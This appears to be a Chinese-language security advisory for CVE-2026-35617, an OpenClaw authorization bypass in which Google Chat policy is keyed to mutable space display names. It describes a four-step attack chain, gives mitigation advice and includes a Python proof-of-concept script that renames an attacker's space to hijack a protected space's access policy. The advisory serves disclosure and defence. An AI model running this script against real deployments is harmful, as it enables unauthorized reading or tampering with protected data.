CVE-2026-35617 CVSS 4.2 中危

CVE-2026-35617 OpenClaw授权绕过漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35617

漏洞类型

授权绕过

CVSS评分

4.2 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.25之前的版本在Google Chat组策略执行逻辑中存在授权绕过漏洞。由于系统依赖可变的空间显示名称进行策略校验，攻击者可以通过修改或伪造空间显示名称来实施策略重新绑定攻击。这使得低权限攻击者能够绕过原有的安全限制，非法访问受保护的资源，造成数据泄露或完整性受损。

技术细节

该漏洞的成因是OpenClaw在实施Google Chat群组策略控制时，错误地将安全上下文绑定到了可变的“空间显示名称”上，而非具有唯一性的空间ID。在正常的权限验证流程中，系统应当通过不可变的资源标识符来匹配策略。然而，攻击者利用了这一逻辑缺陷，首先侦查到受保护敏感资源的显示名称，然后将自己拥有控制权的普通聊天空间的显示名称修改为与目标资源一致。由于系统仅根据显示名称来检索和执行访问控制策略，这导致了策略的“重新绑定”现象。攻击者的空间因此继承了目标空间的访问权限，从而使得低权限用户能够绕过身份验证机制，非法读取或修改受限制的数据资源。

攻击链分析

STEP 1

侦察阶段

攻击者识别出受特定Google Chat组策略保护的敏感空间及其显示名称。

STEP 2

准备阶段

攻击者创建或获取一个自己拥有控制权的普通Google Chat空间。

STEP 3

利用阶段

攻击者将自己控制的空间的显示名称修改为与目标敏感空间完全一致，触发策略重新绑定。

STEP 4

权限提升

由于系统依赖显示名称进行校验，攻击者空间获得了目标空间的访问权限，从而窃取或篡改数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
TARGET_DISPLAY_NAME = "Confidential Project Space"
ATTACKER_SPACE_ID = "attacker_space_id_here"
BASE_URL = "https://api.openclaw.example.com"

def exploit_rebinding():
    # Headers with attacker's session token
    headers = {
        "Authorization": "Bearer <attacker_token>",
        "Content-Type": "application/json"
    }

    # Step 1: Rename the attacker's space to match the target protected space
    rename_payload = {
        "displayName": TARGET_DISPLAY_NAME
    }
    
    print(f"[*] Attempting to rename space {ATTACKER_SPACE_ID} to '{TARGET_DISPLAY_NAME}'...")
    rename_resp = requests.patch(f"{BASE_URL}/spaces/{ATTACKER_SPACE_ID}", json=rename_payload, headers=headers)
    
    if rename_resp.status_code == 200:
        print("[+] Space renamed successfully.")
        
        # Step 2: Attempt to access protected resources using the rebound policy
        print("[*] Attempting to access protected endpoint...")
        access_resp = requests.get(f"{BASE_URL}/protected/data", headers=headers)
        
        if access_resp.status_code == 200:
            print("[+] Exploit successful! Gained unauthorized access.")
            print(f"Data: {access_resp.text}")
        else:
            print("[-] Access denied. Policy might be correctly enforced.")
    else:
        print(f"[-] Failed to rename space. Status: {rename_resp.status_code}")

if __name__ == "__main__":
    exploit_rebinding()

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施

建议管理员暂时禁用基于显示名称的自动策略执行功能，并严格审查Google Chat群组的命名权限，确保只有管理员可以修改敏感空间的显示名称，直到升级完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表